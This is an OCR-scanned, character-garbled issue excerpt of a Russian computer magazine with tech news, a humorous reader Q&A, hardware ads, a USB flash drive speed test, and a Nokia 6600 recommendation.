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НІТЕСНЫЕѴѴЗ ▼ 



КОНКУРС 
ОТ МІСН080РТ 




Дела у небезызвестной корпорации МісгозоТС идут как нельзя лучше, но 
с новаторскими идеями у них небольшой застой. Похоже, обещанной 
революции в Ѵізіа не произойдет, а так недалеко и до оттока пользова- 
телей на другие платформы. Чтобы оставаться всегда на коне, компа- 
ния решила попробовать подпитаться идеями от простых пользовате- 
лей, для чего, совместно с Іпбизігіаі Оезідпегз оі Атегіса (ЮЗА), учреди- 
ла специальный конкурс, который проходил под лозунгом «переосмыс- 
ление роли ПК на базе ѴѴіпсІоѵѵз в жизни людей». Любой желающий мог 
в период с 1 8 мая по 3 октября 2005 года прислать на конкурс свою ра- 
боту, где надо было изобразить, каким он видит компьютер ѴѴіпсІоѵѵз в 
будущем. Из всей массы работ будет выбрано всего три победителя, 
которые будут выбираться авторитетным жюри из ЮЗА (награда — 50 
килобаксов), публичным голосованием (25 килобаксов), плюс специ- 
альный приз от дяди Билли (50 килобаксов). На данный момент голосо- 
вание уже закончено, а его окончательные итоги и вручение наград бу- 
дут подведены в январе 2006 года на выставке СЕЗ в Лас-Вегасе. 



ВИРТУАЛЬНАЯ ГИТАРА 




Ты никогда не мечтал стать рок-звездой? Что, ты не знаешь ни одно- 
го аккорда? А, так у тебя даже гитары нет? На самом деле не все еще 
потеряно. У нескольких студентов из Технологического университета 
в Хельсинки была точно такая же проблема, а тут еще потребовалось 
срочно сдавать курсовую работу. Поэтому они решили реализовать 
мечту своего детства. Так появилась на свет настоящая виртуальная 
гитара, для игры на которой тебе понадобится лишь компьютер, веб- 
камера и пара ярко-оранжевых перчаток. Для музицирования не пот- 
ребуется даже никаких музыкальных навыков, так что достаточно 
просто встать перед камерой и изображать мастерскую игру. В это 
время компьютер будет непрерывно следить за яркими перчатками и 
подбирать подходящие аккорды и манеру игры. При этом гитару мож- 
но настроить как на спокойные мелодичные звуки, так и на зверский 
рев. В дальнейших планах финских студентов — создание целого ан- 
самбля виртуальных инструментов (гитар, барабанов и так далее). 
Кстати, благодаря свому творению ребята не только успешно защи- 
тили курсовую, но и стали даже сравнительно известными у себя на 
родине, несколько раз засветившись в нескольких финских газетах и 
журналах, а также на местном телевидении. 
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ТРАНСФОРМЕРЫ 

ВЕИО 




Пора забыть о тех мониторах, положение которых можно регулировать 
только наклоном вперед или назад. Это старо, примитивно, неудобно 
и непрактично, непрестижно уже, в конце-то концов. Если ты согласен 
с этим, то присмотрись к двум новым мониторам от ВепО: модели 
РР720 +0 и РР920 имеют специальную подставку, положение кото- 
рой можно изменять как в вертикальной, так и в горизонтальной 
плоскостях, а еще регулировать по высоте. Также можно изменять по- 
ложение экрана: с обычного режима на портретный. Это очень удобно, 
особенно если за одним ПК работают несколько человек, каждый из 
которых хочет настроить монитор оптимально под свой рост. Естест- 
венно, что подставкой дело не ограничивается, у этих панелей имеет- 
ся полный набор соответствующих характеристик. Модель РР720+Э 
обладает контрастностью 500:1, время отклика матрицы составляет 
8мс, а РР920 имеет контрастность 450:1, время отклика матрицы — 
12мс. Оба монитора имеют возможность цифрового подключения ЭѴІ. 



ПРОКАЧУ 
С ВЕТЕРКОМ 

Как почувствовать себя за рулем настоящего болида в домашних 
условиях? Канадская компания ѴВХ Іпсіизігіез нашла ответ на этот 
вопрос, выпустив для истинных любителей виртуальных гонок 
комплект под названием Ѵігіиаі Васег Рго. Устройство состоит из 
сиденья, руля, педалей и многоканальной акустической системы, 
закрепленных на устойчивом стальном каркасе. Само собой, си- 
денье взято от реального автомобиля, и для создания ощущений 
максимально приближенных к реальности, установлено на специ- 
альной подвеске, передающей неровности дороги. Комплект сов- 
местим практически со всеми современными консолями 
(РІауЗіаІіоп 2, ХЬох, ХЬох 360 и т.д.), и, конечно, компьютером. Есть 
только одно «но» — данное удовольствие стоит без малого 3 тыся- 
чи евро, однако для тех, кого такие мелочи не смущают, останется 
лишь докупить плазменную панель, размером с полстены, и полное 
погружение в виртуальную реальность гарантировано. 



ПУШИСТЫЙ ФЛЕШ 

Казалось бы, тема ІІЗВ-флешек себя уже практически исчерпала, 
вроде бы все оригинальное, что можно было придумать, уже приду- 
мали и воплотили в жизнь (чего стоят хотя бы флешки в форме отруб- 
ленных пальцев). Впрочем, некоторые фирмы все еще способны про- 
демонстрировать нечто новое. Компания Ітаііоп выпустила в прода- 
жу презабавные флеш-брелки, сделанные в виде плюшевых игру- 
шек. Устройство выпускается в трех вариантах: собака, крокодил и 
бегемот. Все смотрятся одинаково клево, и даже сложно сказать, ко- 
му из них отдать предпочтение. Увы, железная начинка на фоне 
внешнего исполнения выглядит довольно блекло: емкость составляет 
всего 128 Мб, но хоть ІІЗВ 2.0 поддерживается. Пока девайс продает- 
ся только в Японии, да и цена на него весьма завышена (примерно 42 
вечнозеленых енота). Однако если флешки доберутся до России, и 
цена понизится до адекватной планки, то их можно будет порекомен- 
довать в качестве отличного подарка как детям, так и взрослым. 
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НАВРЫЕѴѴЗ ▼ 



СИНИЕ ЗУБКИ 
МІІ8ТЕК 




Помнишь, какими страшными послед- 
ствиями тебя пугали в детстве, когда 
ты отказывался чистить зубы? И вы- 
падут они, и почернеют и... даже вспо- 
минать страшно, что придумывали ро- 
дители, заставляя тебя пользоваться 
щеткой и пастой. Ты вырос и понял, 
что если не применять пасту по отно- 
шению к компьютеру, то у него вырас- 
тут синие зубы! Например, производ- 
ства Мизіек. Эта компания представи- 
ла сразу несколько ВІиеІооІИ-уст- 
ройств. Базовое - это соответствую- 
щий адаптер, без которого ничего не 
получится. Изделие Мизіек МВТ-0120 
поддерживает стандарт синих зубок 
версии 1 .2, выглядит стильно и обес- 
печивает связь в радиусе 10 м от се- 
бя. Но адаптером сегодня никого осо- 
бо не удивишь, а вот гарнитурка - это 
уже интереснее. Выполненная в клас- 
сическом стиле Мизіек МВТ-Н120 может носиться на любом ухе и 
обещает проработать 5,5 часов в режиме разговора и 100 часов в ре- 
жиме ожидания. Перезарядка аккумулятора длится 2 часа. Качество 
и чистоту звука производитель сравнивает с аналогичными парамет- 
рами воды из горного ручейка. 



РіЕиііА 




АѴЕКТѴ В ТВОЕМ ПК 




Ты никогда не любил смотреть телевизор, потому что за него всегда 
шла семейная битва: папа решал посмотреть футбол, младший брат 
— мультики, сестренка понимала, что если именно сейчас не посмот- 
рит концерт Алексы, то сойдет с ума, а мама с бабушкой должны бы- 
ли быть в курсе событий очередного сериала. Короче, битва народов. 
Если это так, то тебе потребуется устройство АѵегМесІіа РѴВ, и после 
установки его в свой компьютер ты можешь смело запираться в ком- 
нате и ни от кого не зависеть в плане развлечений и доступа к инфор- 
мации. Все дело в том, что это не простой ТВ-тюнер, а очень функци- 
ональный. Кстати, не только ТВ, но и РМ-радио тоже очень хорошо ло- 
вит. Главная особенность устройства - это встроенный аппаратный де- 
кодер МРЕО-2, который существенно снижает нагрузку на процессор 
и обеспечивает качественную картинку. Охоту как на ТВ, так и на ра- 
диосигнал он может вести в реальном времени, а может и по заранее 
составленному расписанию. Кроме звука и изображения, АѴегТѴ РѴВ 
работает и с телетекстом. 




окііск 323 М 
ОрбсаІ МоііБе 



окііск 780 І_ 
-О Микітесііа КеуЬоагсІ 



Когда-то в древности Великий Учитель решил испытать 
своих учеников, предложив им выбрать для себя мечи. 

Один из них выбрал легкий меч, надеясь сохранить силы 
в долгом походе. Другой выбрал длинный меч, надеясь 
поразить им больше противников с безопасного 
расстояния. 

Но самым мудрым оказался третий ученик, который 
выбрал для себя самый удобный меч, ставший продолже- 
нием его руки. 

Удобство — вот разумный выбор! 
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О К Ь I С К 




На 1 2 вопросов отвечает Александр Лозовский 




Доброго времени суток, уважаемые! Я, мужчина в самом 
расцвете трухи в голове, рещил написать вам, дорогие, 
письмецо. Даже болезнь моя (э-э-э-э-э... как же она называ- 
ется?) не остановила меня. В наши тяжелые времена резких 
перемен необходимо поддерживать Отечество. В связи с 
этим у меня возникла масса вопросов. Вот некоторые из них: 



1 Какого размера у N30 обувь, 
если он натягивает столько носков? 

2 Почему Форб самый законопослушный гражданин? 

3 После чего Горл гиком стал? 

4 Правда, что у Лозовского в очки встроена 

видео- и фотокамера для записи проходящих мимо? 

5 Правда-ли, что Ма5Іег-І_ате-Маз1ег 

не указывает е-ппаіі, т.к. на самом деле у него его нет? 

6 Бублик был в Тольятти? 

7 Правда-ли, что Кутта самый красивый? 

8 Правда, что Никитоз стал отлично разбираться 
в ПХП после тяжелой черепномозговой травмы, 
перенесенной им далеко в горах Тибета? 

9 Майндворк думает даже во сне (или он не спит)? 

10 Андрюшок биомеханический робот-зомби 
на никсовой платформе? 

11 Хинт сделал огромную партию фейковых дисков 
к одному из номеров? 

12 Алик Вайнер ушел в шоубизнес после того, 

как его фотографии заметили в одном из номеров? 



* и на засыпку: чем на самом деле можно вылечить простудифилис? 
Секс и алкоголь только усилили ее. 




Привет, мужчина! На редкость острые вопросы ты задал! 
Можно даже сказать, что в этих вопросах — квинтэссенция 
всех читательских вопросов прошлого уже года. Попробую 
ответить тебе развернуто. 



1 У N30 обе ноги — из красного дерева, причем старого 
образца, в виде костылей. Поэтому каждое утро 

он одевает несколько пар носков, обмазывает их 
пластилином и превращает в подобие человеческих 
конечностей, чтобы одевать обычную обувь. 

2 Потому что он аспирант и ему не надо косить от армии. 

3 После того как разобрал на части гамма-дефектоскоп 
и порядочно облучил свой мозг излучением 
радиоактивного изотопа цезия. 

4 У меня в очки встроена не обычная камера, а рентгеновская. 
Поэтому, находясь в очках, я могу просматривать 
низкокачественное, черно-белое, но реалистичное порно. 

5 На самом деле у него даже аськи нет, 
потому что он ее установить не может. 

6 Был, работал на ВАЗе окрасчиком двигателей 

до тех пор, пока менеджеры ВАЗа не перестали их красить. 

7 Гы. 

8 Вранье, он никогда не видел гор. Он ненастоящий горец, 
просто прикидывается им, чтобы торговать 

б/у компьютерами на Черкизовском рынке. 

9 Да, он думает 24 часа в сутки. 

Поэтому частенько задерживает статьи. 

10 ДА! ДА! Он крутится на ОрепВЗО. 

1 1 Нет, он ничего не делал. 

1 2 Кто-кто? 



Р.8. Ты точно хочешь узнать мой компетентный ответ про простуду (сотгтюп соісі)? 
Изволь прослушать! Дело в том, что при обычной простуде не рекомендуется про- 
тивовирусное лечение. Симптоматическое - сейчас модно использовать ип- 
ратропиум бромид в виде назального спрея. Плеконарил в таблетках, приня- 
тый в пределах 24 часов с момента болезни, уменьшает продолжительность 
болезни на 1 день, а комбинация интраназального альфа-2Ь интерферона с 
антигистаминными препаратами первой генерации (за счет их собственного 
холинолитического действия, вторая генерация тут не поможет) и ибупрофе- 
ном выражено уменьшает симптомы простуды. Кстати, хочу тебя расстроить. 
Препараты эхинацеи, цинка и аскорбиновой кислоты по современным предс- 
тавлением неэффективны. Доволен ли ты моим ответом? :). 



016 



ХАКЕР 01 /85/ 06 



АЗІІЗ рекомендует ѴѴіпсІоѵѵз® ХР РгоіеззіопаІ 





Современное оружие для покорения мира 




І.СЬ 2 ЕЮ 

2его ВгідИі Ооі 



Гарантия отсутствия ярких точек А51І5 7.В0 

Компания АЗІІЗ, известная высочайшим качеством своей продукции, гарантирует отсутствие ярких точек на 
дисплее ноутбука ѴбОООѴа. Если в течение 30 дней со дня продажи на экране обнаружится хотя бы одна 
яркая точка, дисплей будет заменен.* 

*Для замены дисплея необходим товарный чек или другой документ, подтверждающий факт покупки. 




Ультратонкий и легкий 15-дюймовый ноутбук 

АЗІІЗ ѴбОООѴа - это ультратонкий и легкий ноутбук с 15-дюймовой ІРЗ- 
матрицей с технологиями СоІІог ЗЫпе и СгізіаІІ ЗЫпе. Обладая 
утонченным и элегантным дизайном, ноутбук АЗІІЗ ѴбОООѴа является 
современным символом успеха и стиля. 

піеі® Сепігіпо™ МоЬіІе ТесЬпоІоду 
» Процессор Іпіеі® Репііит® М 770 

► Іпіеі® 915РМ СЬірзеІ 

► Іпіеі® РРЮ/ѴѴігеІезз 2915 а/Ь/д или 2200 Ь/д 
Місгозоіі® ѴѴіпсІоѵѵз® ХР 

* Ноте 

* Ргоіеззіопаі 

лянцевая ТРТ-матрица с диагональю 15.0" и разрешением 5ХСА+ (1400x1050) 

РСІ-Е АТІ МоЫІіІу™ Пабеоп™ Х700 с 128МВ 
ВІиеІооІЬ 
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НЕАВТ ОР ТЕСНЫОЮОУ 

ѵѵѵѵѵѵ.азиз.ги 

Всемирная гарантия 2 года 



Телефон службы технической поддержки А5У5: (095) 23-11-999 



Москва: Армада-РС (495) 641-04-24, Артрон (495) 789-85-80, Аѵакот М (495) 784-67-36, Аѵапіа РС (495) 954-54-22, Белый Ветер (495) 730-30-30, РогсеСотр (495) 775-66-55, ЮМ (495) 729-57-10, 
МЕХІІЗ (495) 928-23-67, Тенфолд (495) 545-32-71, ОІЛЭІ (495) 105-07-00, ПИРИТ (495) 974-32-10, Роіагіз (495) 755-55-57, Портком (495) 101-33-64, Респект (495) 177-40-77, Сетевая Лаборатория 
(095) 500-03-05, ЗМ5 (495) 956-12-25; СтартМастер (495) 967-15-15, ТФК (495) 518-83-58; Умные машины (495) 780-00-41, Ф-Центр (495) 105-64-47, ІІЗІЧ (495) 775-82-02; Санкт-Петербург: 
Різріау (812) 103-00-18, КЕЙ (812) 331-24-77, Микробит (812) 333-44-44, Компьютерный мир (812) 333-00-33; СТР Компьютере (812) 542-4551; Барнаул: С-Тгабе (3852) 38-10-00; Воронеж: РЕТ 
(0732) 77-93-39; Екатеринбург: Парад (3432) 51-48-22, Старттехно+ (3432) 56-85-01; Краснодар: Владос (8612) 62-33-73, Санрайз (8612) 640-066; Новосибирск: НЭТА (3832)16-33-11, 
Техносити (3832) 125-333; Ростов на Дону: Центр-Дон (8632) 698-668; Самара: Прагма (8462) 701-701; Томск: Интант (3822) 41-55-32; Тюмень: АР Зузіетз (3452) 22-35-33; Челябинск: 
Японская электроника (3512) 63-74-34; Хабаровск: Апукеу (4212) 328-155 



Іпіеі, ІпіеІ Іодо, ІпіеІ Іпзібе, Іпіеі Іпзібе Іодо, Іпіеі Сепігіпо, ІпіеІ Сепігіпо Іодо, Сеіегоп, ІпіеІ Хеоп, Іпіеі ЗреесІЗіер, Ііапіит, апб Репііит аге Ігабетагкз ог гедізіегесі Ігабетагкз оі ІпіеІ Согрогаііоп ог Из зиЬзісІіагіез іп ІИе Ііпііеб Зіаіез апб оІНег соипігіез. 




А-РАТА ВСй ЗМАВТ 512МВ 
ЗІИСОМ РОѴѴЕВ ШХМІІЧІ 310 256МВ 
І_Ѳ ХЗТІСК МІВВОВ 2ѲВ 
йІѲМА ІІЗВ РІ.АЗН РПІѴЕ 256МВ 
ІМАТІОМ РІ.А5Н ОРІІѴЕ МІІЧІ 256МВ 
І_Ѳ ХЗТІСК АШМІШМ 2ѲВ 
І_Ѳ ХЗТІСК РІ_АТІІ\ІІІМ 1ѲВ 
ЗОМѴ МІСРІО ѴАІЛТ РШЗ 256МВ 
ЗОМѴ МІСРІО ѴАІЛТ 128МВ 
КІІМѲМАХ МАХРРІІѴЕ I 512МВ 
РОІ ІІЧТЕШѲЕМТ ЗТІСК 512МВ 
АР АСЕР! НАШУ ЗТЕШ НТ203 1ѲВ 



ПАМЯТЬ В КАРМАНЕ 

тестирование внешних ІІЗВ-РІ.АЗН Накопителей 



Іпіго 

Технология 

X 



* 

к 



Методика 

тестирования 



Совет 

Выводы 
Тестовый стенд 



Шехтман Александр ІезНаЬ (ІезНаЬ@датеІапсІ.ги) 



Рынок флеш-памяти не стоит на месте: производители выпускают все больше и больше различных моделей 
ІІЗВ-накопителей. Возрастает скорость записи, уменьшается их размер и стоимость. В нашем тесте мы 



рассмотрим очередную подборку таких носителей. 


Для начала рассмотрим строение элементарной 
ячейки. Ее основной элемент — специальный тран- 
зистор: полевой транзистор с плавающим затвором. 
Последний представляет собой электрод, никак не 
соединенный со схемой подключения, так как он пол- 
ностью огражден диэлектриком. Помимо него, име- 
ются еще три электрода: исток, сток и затвор (они 
уже соединены со схемой). При подаче напряжения 
на затвор часть электронов, обладающих достаточно 
большой энергией, могут пройти сквозь диэлектрик 
(туннелировать) и «осесть» на плавающем затворе. 
Так как этот плавающий электрод не соединен галь- 
ванически с внешней средой, то электроны могут на 
нем находится сколько угодно, если у него найдется 
энергии для преодоления изолирующего слоя (это 
один из несомненных преимуществ РІ_А5Н-памяти). 
При этом для хранения электронов на транзистор не 
надо подавать напряжение, а значит мы имеем энер- 
гонезависимость. При этом находящиеся на плаваю- 
щем затворе электроны влияют на прохождение то- 
ка через транзистор и, следовательно, мы можем оп- 


ределить, есть ли они там или нет. Чтобы убрать 
электроны с плавающего затвора, необходимо по- 
дать на затвор напряжение противоположного знака, 
после чего электрическое поле сообщит электронам 
энергию, необходимую для преодоления слоя диэле- 
ктрика, и они «стекут» во внешнюю цепь. Таким об- 
разом, у нас имеется два состояния, а значит, одна 
такая ячейка способна хранить один бит данных. Но 
этим возможности ячеек не ограничиваются и в сов- 
ременных носителях применяются так называемые 
МІ_С (тиШІеѵеІ сеІІ — многоуровневая ячейка). Здесь 
уже фиксируется не наличие или отсутствие заряда 
на плавающем затворе, а его уровень. Таким обра- 
зом, в одной ячейке могут хранится несколько бит 
информации. Многоуровневые ячейки имеют как 
преимущества: низкая себестоимость, большей объ- 
ем сохраняемой информации на единицу площади, 
возможность формированиямикросхем большого 
размера, так и недостатки: надежность ниже, чем у 
одноуровневых, более сложная система чтения/за- 
писи, не такое высокое быстродействие. 


Для тестирования использовалась известная ути- 
лита Ш Раѵіз Мебіа ѴѴіпВепсІі 99, которая выдава- 
ла следующую информацию: время доступа к ин- 
формации в миллисекундах, степень загрузки про- 
цессора во время работы флешки в процентах, 
график зависимости скорости чтения/записи от то- 
го, с какой областью памяти идет работа. Так же 
фиксировались скорости чтения/записи в начале и 


в конце диапазона. Помимо этого, оценивались эр- 
гономические характеристики носителей и в осо- 
бенности их размеры. Это важный показатель, так 
как если ІІЗВ-порты расположены очень близко 
друг от друга, то большой девайс может попросту 
перекрывать соседние интерфейсы. Так же ос- 
матривались и специфические параметры, харак- 
терные для каждой флешки в отдельности. 



Хоть флешки поддерживают «горячую» замену, но все же рекомендуется предварительно завершать рабо- 
ту с ними. Для этого в трее надо найти иконку «За^еіу Ветоѵе Нагсіѵѵаге», затем кликнуть на нее левой кноп- 
кой, выбрать необходимый диск и нажать на него. После этого всплывет окошко, что девайс может быть 
извлечен. Это простое правило можно и не соблюдать, но в этом случае велика вероятность потери данных. 



Как видно из теста, на рынке представлено такое количество носителей на РІ_АЗН-памяти, что почти 
каждый пользователь сможет найти себе подходящий девайс. Здесь можно ориентироваться не только 
на объем, но и даже такие субъективные параметры, как дизайн, физические размеры и так далее. 



Процессор: АМР АШІоп 64 2800+ 

Память: 1256 Мб Кіпдзіоп 

Материнская плата: Ерох 8кбаЗі пРогсе 3 250ѲВ 
Видеокарта: Зарріііге ВАРЕОІЧ 9800РВО 1 28Мб 
Жесткий диск: 80ѲЬ Зеадаіе Ваггасисіа IV 



іѳзі_ІаЬ выражает благодарность за предоставленное на тестирование оборудование компании: международное рекламное 
агентство Ітаде Мебіа, Альянс (т.(495)796-9356, \ллллл/,аІІІапседгоир.ги), ЫЕОѲІЮІІР (\ллллл/.пео,ги), АЛ-Цент Микросистеме 
(т. (495)232-0281, \ллллл/.ак-сепі.ги), МЕРЛИОН (\ллллл/.тегІіоп.ги), а также российские представительства компаний Ітаііоп и І_Ѳ. 




ЗіІюопРоѵиегІ 
ІліхМіпі 310 



256МЬ 



ьс 

Хзііск Міггог 



йідта 115В 
РІазЬ сігіѵе 



256МВ 



Загрузка процессора, доли от единицы: 4,54 


Загрузка процессора, доли от единицы: 5,28 


Загрузка процессора, доли от единицы: 5,04 


Индекс передачи данных в начале диапазона, Кбайт/с: 1 5700 
Индекс передачи данных в конце диапазона, Кбайт/с: 1 5900 
Размеры, мм: 56.3x17x11.7 


Индекс передачи данных в начале диапазона, Кбайт/с: 1 1 400 
Индекс передачи данных в конце диапазона, Кбайт/с: 11400 
Размеры, мм: 63 х 20.6 х 7 


Индекс передачи данных в начале диапазона, Кбайт/с: 1 9300 
Индекс передачи данных в конце диапазона, Кбайт/с: 1 9300 
Размеры, мм: 70 х 16 х 8 


$21 


$141 


$34 


★★★★★★★★ 


★★★★★★★★ 


★★★★★★★★★ 



Эта флешка скорее подойдет представительницам 
женского пола, так как имеет небольшие размеры 
и форму, напоминающую губную помаду. Тем не 
менее скоростные характеристики остались на вы- 
соком уровне: время доступа и индексы передачи 
данных приближаются к рекордным показателям. 
На диаграмме виден лишь один заметный скачок в 
скорости чтения - он располагается в самом нача- 
ле диапазона. Расход ресурсов процессора также 
весьма невелик. Корпус слегка сужается ближе к 
разъему, что облегчает установку флеш-накопите- 
ля, когда порты расположены близко друг к другу. 



Стильная флешка, верхняя часть которой вы- 
полнена из зеркального пластика. Это безус- 
ловно смотрится отлично, но только до тех пор, 
пока вы не коснетесь этой поверхности, так как 
на ней сразу же остаются заметные отпечатки. 
В остальном характеристики девайса находят- 
ся на среднем уровне, правда, скоростные по- 
казатели невысоки. График получился ров- 
ный, а имеющийся на нем один резкий перепад 
особого значения играть не будет. Порадовало 
наличие в комплекте ремешка для ношения 
І_Ѳ Хзііск Міггог 2ѲЬ на шее. 



Этот девайс можно уверенно назвать скоростным ре- 
кордсменом теста: таких высоких значений показате- 
лей передачи данных нет ни у одного из его оппонен- 
тов. Несмотря на это, загрузка процессора и время 
доступа к памяти находятся не на самом лучшем 
уровне (они все же высоковаты), а на графике видны 
большие скачки, один из которых находится в сере- 
дине диапазона. Корпус имеет небольшую толщину и 
отличается от ІІ8В-порта всего на три миллиметра. 
Крышка снабжена специальными защелками, хоро- 
шо закрепляющими ее. На задней части есть окошко 
для веревочки, но ее, к сожалению, в комплекте нет. 



4 




н 



Г 




$опу тісго 
ѴаиІІ ріиз 



256МЬ 



Время доступа к памяти, мс: 0,902 

Загрузка процессора, доли от единицы: 4,4 

Индекс передачи данных в начале диапазона, Кбайт/с: 1 1 800 
Индекс передачи данных в конце диапазона, Кбайт/с: 1 1 900 
Размеры, мм: 58 х 17 х 7 

$33 

★*** ***★ 



Зопу I 

тісго ѴаиІІ 



128МЬ 



Время доступа к памяти, мс: 0,748 

Загрузка процессора, доли от единицы: 5,73 

Индекс передачи данных в начале диапазона, Кбайт/с: 5190 
Индекс передачи данных в конце диапазона, Кбайт/с: 51 90 
Размеры, мм: 20 х 7 х 61 



$150 



★★★★★★★★ 



512МЬ 



РСМ 

ІпіеІІідепі Зііск 



Время доступа к памяти, мс: 0,699 

Загрузка процессора, доли от единицы: 6,2 

Индекс передачи данных в начале диапазона, Кбайт/с: 8120 
Индекс передачи данных в конце диапазона, Кбайт: 8070 
Размеры, мм: 18 х 2 х 43 

$36 

******** 



Одна из самых компактных флешек в обзоре, 
правда, по толщине она все же не дотягивает до 
рекорда. Скорости чтения и записи высокие, заг- 
рузка процессора невелика, а вот время доступа 
очень большое. Если не считать двух резких скач- 
ков, то полученный график можно назвать практи- 
чески идеальным. На крышке предусмотрено коль- 
цо для ремешка, но последний в комплекте отсут- 
ствует, впрочем, как и удлинитель ІІЗВ. Крышка 
никак не крепится к корпусу и ее легко потерять. 



Сразу же отметим замечательную способность 
этой флешки: она снабжена детектором отпечат- 
ков пальцев, так что если есть необходимость пе- 
реноса конфиденциальной информации, то 8опу 
тісго ѴаиІІ 128 будет очень кстати, так как, кроме 
тебя, ни у кого не будет к ней доступа. Все необхо- 
димое программное обеспечение входит в комп- 
лект. Тем не менее из-за этого детектора размеры 
диска получились весьма значительными, а чтобы 
это не мешало подключению, разработчики сдела- 
ли корпус, сужающийся ближе к ІІЗВ-порту. А вот 
результаты теста оказались невысокими: рекорд- 
но низкая скорость и высокая загрузка процессо- 
ра. График остался ровным. 



Самая компактная флешка в тесте, так как ее 
толщина примерно в 2,5 раза меньше, чем у 
стандартного разъема ІІЗВ! С одной стороны, 
это хорошо, но с другой — длина ее все же дос- 
таточно велика, чтобы ее можно было легко сло- 
мать. Упаковка имеет вид пластины, в которой 
могут находиться сразу два подобных девайса. 
А вот скоростные показатели не порадовали: 
они находятся на низком уровне. Тем не менее 
график получился ровным, правда, при такой 
скорости чтения/записи это слабое утешение. 
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256МВ 



Ітаііоп 
РІазИ Огіѵе Міпі 



І.С Хзііск 
АІитіпит 



20В 



І.С Хзііск 
Ріаііпит 



10В 



Время доступа к памяти, мс: 0,87 

Загрузка процессора, доли от единицы: 5,57 

Индекс передачи данных в начале диапазона, Кбайт/с: 1 2700 
Индекс передачи данных в конце диапазона, Кбайт/с: 12700 
Размеры, мм: 56 х 17 х 8 

$23 

********* 



Время доступа к памяти, мс: 0,518 

Загрузка процессора, доли от единицы: 4,19 

Индекс передачи данных в начале диапазона, Кбайт/с: 1 1 400 
Индекс передачи данных в конце диапазона, Кбайт/с: 6720 
Размеры, мм: 56 х 17 х 8 

$139 

******** 



Время доступа к памяти, мс: 0,802 

Загрузка процессора, доли от единицы: 5,4 

Индекс передачи данных в начале диапазона, Кбайт/с: 8070 
Индекс передачи данных в конце диапазона, Кбайт: 8000 
Размеры, мм: 51 х 13 х 5 

$87 

★★★★★★★ 



Ітаііоп РІазМ Огіѵе Міпі отличается особой конструкции 
защитной крышки: она выполнена в виде дужки, спо- 
собной поворачиваться на 360 градусов и тем самым 
прикрывать разъем. К сожалению, от пыли такая 
конструкция не защитит, так как по бокам никаких пре- 
пятствий для нее нет. Чтобы в открытом положении был 
виден индикатор работы, на крышке сделано специаль- 
ное отверстие. Помимо этого, на ней предусмотрено 
кольцо для ремешка. Результаты тестирования оказа- 
лись скорее на низком уровне: скорость доступа приб- 
лижается к антирекорду, время доступа чуть не доходит 
до миллисекунды. График имеет ярко выраженную 
пильчатую форму и ряд незначительных перепадов. 



По внешнему виду этот флеш-диск напоминает 
своего выше описанного собрата, но верхняя часть 
корпуса не зеркальная, а матовая. Во всем осталь- 
ном они более или менее схожи, правда, у этой заг- 
рузки процессора почти рекордно низкая скорость. 
Из отрицательных сторон можно отметить низкий 
скоростной показатель в конце диапазона, что лег- 
ко видеть на графике, который, кстати говоря, не 
самый лучший, так как чуть дальше середины ско- 
рость резко падает и сохраняется такой до конца. 



Если ты подаришь эту флешку своей девушке, то 
она будет в восторге: компактная, корпус пол- 
ностью выполнен из блестящего металла, в комп- 
лект входит цепочка, которую можно носить на 
шее, и все это упаковано в стильную, снаружи се- 
ребристую, а внутри покрытую бархатной тканью 
коробочку. Выглядит здорово! Правда, скорост- 
ные показатели оказались на невысоком уровне: 
время доступа все же великовато, а скорость на 
среднем уровне по тесту. График чтения/записи 
ровный и никаких претензий к нему нет. 




КІЫСМАХ 
Мах Огіѵе I 



512МЬ 



Время доступа к памяти, мс: 0,501 

Загрузка процессора, доли от единицы: 6,22 

Индекс передачи данных в начале диапазона, Кбайт/с: 1 1 200 
Индекс передачи данных в конце диапазона, Кбайт/с: 6660 
Размеры, мм: 18 х 8 х 66 

$32 



А-Оаіа 
ВСР Зтагі 



512МЬ 



Время доступа к памяти, мс: 0,824 

Загрузка процессора, доли от единицы: 4,25 

Индекс передачи данных в начале диапазона, Кбайт/с: 1 2800 
Индекс передачи данных в конце диапазона, Кбайт/с: 12800 
Размеры, мм: 51 х 20 х 8 

$38 



Арасег 
НШОУ 
8ТЕЫО НТ203 




Время доступа к памяти, мс: 0,748 

Загрузка процессора, доли от единицы: 9,56 

Индекс передачи данных в начале диапазона, Кбайт/с: 24900 
Индекс передачи данных в конце диапазона, Кбайт/с: 25000 
Размеры, мм: 21 х 8 х 84 



★★★★★★★★ 



★★★★★★★★ 



$106 



У этого устройства нет крышки, защищающей 
разъем от пыли, — для этого сам разъем задви- 
гается в корпус. К сожалению, рычажок, кото- 
рый надо при этом двигать, снабжен лишь не- 
большими выступами, которые слабо защищают 
от проскальзывания пальцев. Эта флешка обла- 
дает не самым лучшим графиком чтения/записи: 
видны два продолжительных и очень резких 
скачка скорости, причем эти области больше, 
чем те, на которых скорость велика. Все это вид- 
но и в численных значениях. Поэтому индексы 
передачи данных в начале и конце диапазона 
сильно различаются. 



Сразу же бросается в глаза встроенный жидкок- 
ристаллический дисплей, на котором в виде сек- 
торной диаграммы отображается заполнение 
флешки (чем больше места занято, тем больше 
сектор круга закрашен) и название диска. На- 
чальное и конечное значение индекса передачи 
данных находятся скорее на высоком уровне, в то 
время как загрузка процессора могла бы быть и 
поменьше. Время доступа к памяти особо не от- 
личается от конкурентов. График чтения/записи 
ровный, но заметные скачки все же имеют место. 
Из недостатков можно отметить большие разме- 
ры носителя. Крышка, закрывающая разъем, ни- 
как не крепится к корпусу. 



★★★★★★★★★★ 



Эту флешку можно по праву назвать самой луч- 
шей в обзоре по всем показателям, и самый глав- 
ный из них — скорость: она в два раза выше, чем 
у любой описанной выше! На этом фоне неболь- 
шие отклонения на графике чтения/записи будут 
ничтожно малыми, так что заполнить память пол- 
ностью можно очень быстро. Хорошая эргономи- 
ка: толщина девайса небольшая, а крышка кре- 
пится к корпусу стильным металлическим троси- 
ком, и потерять ее практически нереально. Да и 
дизайн Арасег НАІ\ЮѴЗТЕІ\Ю НТ203 сразу выде- 
ляет ее из общей массы. 
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ХАКЕР РЕКОМЕНДУЕТ ///// ІЗЗІІЕ 



НОКІА 

6600 



$260 





МНОГО СОФТА ХОРОШИЙ ЭКРАН ѴѲА-КАМЕРА УДОБНАЯ ШТУКА ОХОТА НА ВШЕТООТН 



Смартфон работает под 
ЗутЬіап шестой версии и 
для него написали очень 
много самого разнообраз- 
ного софта. На 6600 без 
проблем можно поставить 
даже порт Риму и по ЗЗН 
запускать и контролиро- 
вать свои гразные про- 
цессы на удаленном шел- 
ле. Можно элементарно 
установить Орега и сер- 
фить инет; можно поста- 
вить ШгаМРЗ, подключить 
